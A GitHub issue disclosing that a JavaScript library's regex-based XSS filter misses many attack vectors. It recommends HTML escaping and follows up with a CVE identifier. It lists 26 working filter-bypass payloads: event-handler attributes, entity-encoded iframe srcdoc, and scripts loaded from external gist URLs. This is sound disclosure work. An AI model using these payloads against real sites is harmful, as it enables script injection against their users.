Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerable to XSS attacks #16

Open
cianmce opened this issue Mar 26, 2018 · 4 comments
Open

Vulnerable to XSS attacks #16

cianmce opened this issue Mar 26, 2018 · 4 comments

Comments

@cianmce
Copy link

cianmce commented Mar 26, 2018
edited
Loading

I found multiple XSS Attack vectors that aren't caught by the isXss function:

protect/lib/rules/xss.js

Lines 4 to 13 in 60b0c91

* XSS regex reference - taken from symantec
* http://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks
*/
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
function isXss (value) {
return xssSimple.test(value) || xssImgSrc.test(value)
}

tl;dr

Don't use regex's for sanitization of HTML but if you are, then at least strip out all tags with something like:

const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')

But with even this, I'd imagine a carefully constructed XSS vector could get around it
I'd advise:

  • Escaping the characters using HTML entities
    e.g.
var entityMap = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
};
escapeHtml = function(value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (s) {
    return entityMap[s];
  });
}
  • Using a nodes text attribute(This isn't an option for server side code)
    e.g.
document.getElementById("my_id").innerText = unsafeString;

As discussed in many posts e.g.

Regular expressions are not a valid approach when dealing with a more complicated language(especially when browsers support dirty HTML)

For example, here are 26 valid XSS attack vectors that are all reported as false

Attack Vectors

<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 12')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 13')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > 
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > 
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > 
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
  <!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">

Proof Of Concept

These have been tested on the current function, the updated function to test for any tags, being escaped and being set using the text attribute.
The results can be seen here: http://embed.plnkr.co/xHbhB29JWWyMUMeHsLrm

I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet.

If you insist on using regex, here's a good list + just remove any tag
https://github.com/PHPIDS/PHPIDS/blob/master/lib/IDS/default_filter.json
@cianmce cianmce changed the title Vulnerable to XSS attacs Vulnerable to XSS attacts Mar 27, 2018
@cianmce cianmce changed the title Vulnerable to XSS attacts Vulnerable to XSS attacks Mar 27, 2018
@cianmce
Copy link
Author

cianmce commented Oct 28, 2018

CVE-2018-1000160 can be used to track this issue

@vdeturckheim
Copy link

@cianmce I am curious. Which CNA assigned this CVE?

@attritionorg
Copy link

@vdeturckheim Any CVE that is 7 digits the CNA will be DWF. You can also see the assigning CNA on CVE's web site as of earlier this year:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000160

Assigning CNA

Distributed Weakness Filing Project

@vdeturckheim
Copy link

@attritionorg good catch thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@attritionorg @cianmce @vdeturckheim